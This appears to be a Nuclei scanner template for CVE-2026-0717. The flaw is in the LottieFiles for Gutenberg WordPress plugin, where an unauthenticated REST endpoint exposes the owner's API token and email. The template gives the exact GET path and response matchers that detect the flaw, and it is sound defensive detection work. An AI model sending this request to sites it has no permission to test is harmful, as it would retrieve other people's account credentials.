id: CVE-2026-0717 info: name: LottieFiles for Gutenberg <= 3.0.0 - Unauthenticated Settings Disclosure author: str4k3r severity: medium description: | The LottieFiles – Lottie block for Gutenberg plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.0.0 via the `/wp-json/lottiefiles/v1/settings/` REST API endpoint. This makes it possible for unauthenticated attackers to retrieve the site owner's LottieFiles.com account credentials including their API access token and email address when the 'Share LottieFiles account with other WordPress users' option is enabled. impact: | Unauthenticated attackers can retrieve API tokens and email addresses, compromising account security and privacy. remediation: | Update to the latest version beyond 3.0.0. reference: - https://www.wordfence.com/threat-intel/vulnerabilities/id/19b159ca-4b41-48b4-880d-9b9dc44b3463?source=cve - https://plugins.trac.wordpress.org/browser/lottiefiles/tags/3.0.0/src/common.php?marks=21,122#L21 - https://plugins.trac.wordpress.org/changeset/3442469/ classification: cve-id: CVE-2026-0717 epss-score: 0.0093 epss-percentile: 0.604 metadata: verified: true max-request: 1 tags: cve,cve2026,wordpress,lottiefiles,gutenberg,exposure,unauth http: - method: GET path: - "{{BaseURL}}/wp-json/lottiefiles/v1/settings/" matchers-condition: and matchers: - type: word part: body words: - "is_block_logged_in" - type: status status: - 200 # digest: 490a0046304402206a647304c894ed6d87e83702eb04f2d4a06a17713d20645b6f5b9adc6cd2893a02203b2a7be5dd5eb8c425b2bfba767970b6a31eb637dd3d178efc5abe39f7505475:922c64590222798bb761d5b6d8e72950